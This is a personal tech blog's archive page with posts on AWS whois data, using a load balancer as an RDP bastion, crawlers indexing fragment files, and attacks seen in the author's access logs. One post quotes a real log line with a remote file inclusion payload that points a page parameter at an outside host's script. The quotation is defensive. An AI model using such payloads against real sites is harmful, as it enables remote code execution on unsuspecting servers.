blog.kdgregory.com: website management

Showing posts with label website management. Show all posts

Tuesday, June 8, 2021

An open letter to the AWS Training organization

You don't have a Feedback link on your site, but it seems that Amazon keeps close tabs on the Blogosphere, so hopefully this reaches you.

I don't know whether you're an actual sub-division of Amazon, but the website URL https://www.aws.training certainly didn't give me a warm fuzzy feeling when it came up in Google. In fact, my first thought was that it was some unaffiliated company that had better SEO.

So, since it was asking me for login credentials, I did what any reasonably cautious technologist would do, and ran whois. And this is what I got back:

Domain Name: aws.training
Registry Domain ID: 8d519b3def254d2f980a08f62416a5b9-DONUTS
Registrar WHOIS Server: whois.comlaude.com
Registrar URL: http://www.comlaude.com
Updated Date: 2019-05-19T19:54:24Z
Creation Date: 2014-03-19T00:32:11Z
Registry Expiry Date: 2024-03-19T00:32:11Z
Registrar: Nom-iq Ltd. dba COM LAUDE
Registrar IANA ID: 470
Registrar Abuse Contact Email: abuse@comlaude.com
Registrar Abuse Contact Phone: +44.2074218250
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Amazon Technologies, Inc.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: NV
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

That's the sort of whois entry that you get for an individual using a shared hosting service. In fact, it provides less information than you'll see with my domain, which runs on a shared hosting service, and I pay extra for privacy.

By comparison, the whois entry for Amazon itself looks like this (and note that it's a different registrar, another red flag):

Domain Name: amazon.com
Registry Domain ID: 281209_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2019-08-26T12:19:56-0700
Creation Date: 1994-10-31T21:00:00-0800
Registrar Registration Expiration Date: 2024-10-30T00:00:00-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895770
Registrant Name: Hostmaster, Amazon Legal Dept.
Registrant Organization: Amazon Technologies, Inc.
Registrant Street: P.O. Box 8102
Registrant City: Reno
Registrant State/Province: NV
Registrant Postal Code: 89507
Registrant Country: US
Registrant Phone: +1.2062664064
Registrant Phone Ext: 
Registrant Fax: +1.2062667010
Registrant Fax Ext: 
Registrant Email: hostmaster@amazon.com

While I'm a little surprised by the Reno address, rather than Seattle, this at least looks like the sort of registration information used by a business rather than somebody who pays $10/month for hosting.

I ended up getting to the training site via a link on the AWS Console, so was able to achieve my goal.

But I think there's a general lesson: don't forsake your brand without good reason.

And at the very least, ask your network administrators to update your whois data.

Wednesday, December 21, 2016

Hacking the VPC: ELB as Bastion

A common deployment structure for Amazon Virtual Private Clouds (VPCs) is to separate your servers into public and private subnets. For example, you put your webservers into the public subnet, and database servers in the private subnet. Or for more security you put all of your servers in the private subnet, with an Elastic Load Balancer (ELB) in the public subnet as the only point-of-contact with the open Internet.

The problem with this second architecture is that you have no way to get to those servers for troubleshooting: the definition of a private subnet is that it does not expose servers to the Internet.*

The standard solution involves a “bastion” host: a separate EC2 instance that runs on the public subnet and exposes a limited number of ports to the outside world. For a Linux-centric distribution, it might expose port 22 (SSH), usually restricted to a limited number of source IP addresses. In order to access a host on the private network, you first connect to the bastion host and then from there connect to the private host (although there's a neat trick with netcat that lets you connect via the bastion without an explicit login).

The problem with a bastion host — or, for Windows users, an RD Gateway — is that it costs money. Not much, to be sure: ssh forwarding doesn't require much in the way of resources, so a t2.nano instance is sufficient. But still …

It turns out that you've already got a bastion host in your public subnet: the ELB. You might think of your ELB as just front-end for your webservers: it accepts requests and forwards them to one of a fleet of servers. If you get fancy, maybe you enable session stickiness, or do HTTPS termination at the load balancer. But what you may not realize is that an ELB can forward any TCP port.**

So, let's say that you're running some Windows servers in the private subnet. To expose them to the Internet, go into your ELB config and forward traffic from port 3389:

Of course, you don't really want to expose those servers to the Internet, you want to expose them to your office network. That's controlled by the security group that's attached to the ELB; add an inbound rule that just allows access from your home/office network (yeah, I'm not showing my real IP here):

Lastly, if you use an explicit security group to control traffic from the ELB to the servers, you'll also need to open the port on it. Personally, I like the idea of a “default” security group that allows all components of an application within the VPC to talk with each other.

You should now be able to fire up your favorite rdesktop client and connect to a server.

> xfreerdp --plugin cliprdr -u Administrator 52.15.40.131
loading plugin cliprdr
connected to 52.15.40.131:3389
Password: 
...

The big drawback, of course, is that you have to control over which server you connect to. But for many troubleshooting tasks, that doesn't matter: any server in the load balancer's list will show the same behavior. And in development, where you often have only one server, this technique lets you avoid creating special configuration that won't run in production.

* Actually, the definition of a public subnet is that it routes non-VPC traffic to an Internet Gateway, which is a precondition for exposing servers to the Internet. However, this isn't a sufficient condition: even if you have an Internet Gateway you can prevent access to a host by not giving it a public IP. But such pedantic distinctions are not really relevant to the point of this post; for practical purposes, a private subnet doesn't allow any access from the Internet to its hosts, while a public subnet might.

** I should clarify: the Classic Load Balancer can forward any port; an Application load balancer just handles HTTP and HTTPS, but has highly configurable routing. See the docs for more details.

Wednesday, February 26, 2014

Nosy Web Spiders

The other day I was Googling for some technical detail that I'd written about (you think I remember where I put stuff?), and saw some surprising results: in addition to the public web page that I wanted, I also saw the PHP “fragment” that I use to build the public page. This was surprising because there aren't any links to that page on my site; the only reference to it is in a table that associates the page name to a filename.

Looking at the structure of my site, I realized what had happened. In my original site design, I had put all of the page-related content in the same directory as the fragment file. A few years ago I re-organized the files, but left one presentation in place; it was linked by a couple of sites, and I had no way at that time to do a 301 redirect. While that decision seemed harmless, it left me open to the following:

66.249.73.164 - - [30/Aug/2013:15:21:34 -0700] "GET /programming/ HTTP/1.1" 200 1542 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [30/Aug/2013:15:23:03 -0700] "GET /programming/intro.frag HTTP/1.1" 200 2355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [30/Aug/2013:15:23:57 -0700] "GET /programming/scm.git.frag HTTP/1.1" 200 34073 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

To explain: they took the URL for the presentation, stripped off the filename component, and retrieved a directory listing. Then they crawled each of the files returned from that listing, and added them to their index. This is, quite frankly, a script-kiddie hack. In fact, the first time I saw this behavior it was a script-kiddie exploring my site.

I don't really care about script-kiddies: the directories that I want to keep private have directory listings disabled, and also have a dummy index.html that redirects back to my home page. If someone wants to learn my madd skillz with PHP, fine, have at it (but don't feel compelled to comment if you don't find my skillz that madd).

But why does Google (and Bing, and Baidu, and many others) feel the need to do this?

I try to follow their rules: I have a sitemap that lists the “interesting” pages on my site; I use noindex and nofollow meta tags (and canonical, which is a whole ‘nother rant); I have a robots.txt that lists directories that aren't covered by the meta tags. In short, I have presented them with my website as I want it to appear in their index.

But they choose to ignore that, poke around my website, and pick up whatever droppings they can find. Which ultimately makes their index, and the Internet as a whole, a worse place.

I suppose it's time to update robots.txt.

Saturday, October 3, 2009

Script Kiddies

As you might have guessed from my earlier posting about del.icio.us, I pay attention to the access logs for my main website. It's interesting to see what pages are getting traffic, and where that traffic is coming from. This month, of course, the article on Java Reference Objects was far and away the winner, with almost exactly 50% of the hits. However, nearly 25% of these hits came from Google searches — which is not surprising, since it's on the first page when you Google “java reference objects”. Unfortunately for the world of software, a lot of the query strings indicate deep misunderstandings of how Java works. And then there are the strange ones: I have yet to figure out what “sensitive objects” could be.

What's really interesting about my access logs, however — and why I look at them rather than using a web beacon — are the attacks on my site. I have a homegrown page management system, which I think is fairly solid, but ever since I saw the first attack I've paid attention to them. Here's a a typical log entry, that appears to be coming from a home computer:

68.217.2.156 - - [05/Sep/2009:16:38:07 -0700] "GET /index.php?page=http://64.15.67.17/~calebsbi/logo.jpg? HTTP/1.1"

If my pages blindly took the page parameter value and passed it to include, this attack would work. And if you Google for “calebsbi” you'll see over 30,000 hits, indicating that there are a lot of people who blindly pass parameters to include. Other attacks try to read the password file, and one enterprising person wrote a script that sent himself email (to a Google address, which I promptly reported).

What's amazing to me is the amount of effort these people expend. Oh, sure, I expect that the actual hits come from a bot, but someone has gone to the trouble to figure out that my site is driven by the page parameter: I don't get hits with include= or sql=. And it's not always a botnet doing the hits: one night a person came to my site from Twitter, and spent over an hour trying different URL combinations. He (I'll assume) actually managed to uncover portions of my site's directory tree (the programming examples use a simple directory tree, which has since been “capped” with a redirect), and started trying URLs that included functions from my page fragments.

So far, my site hasn't been hacked, and I think a large part of the reason is that the attackers have been “script kiddies,” trying attacks that they don't really understand. The person who walked my programming directories, for example, kept putting needless parameters on the URLs. And if you try to retrieve “logo.jpg”, you'll find that there's no longer any webserver at that address. Yet the attacks keep coming, so I keep looking to see that my site code behaves as expected.

blog.kdgregory.com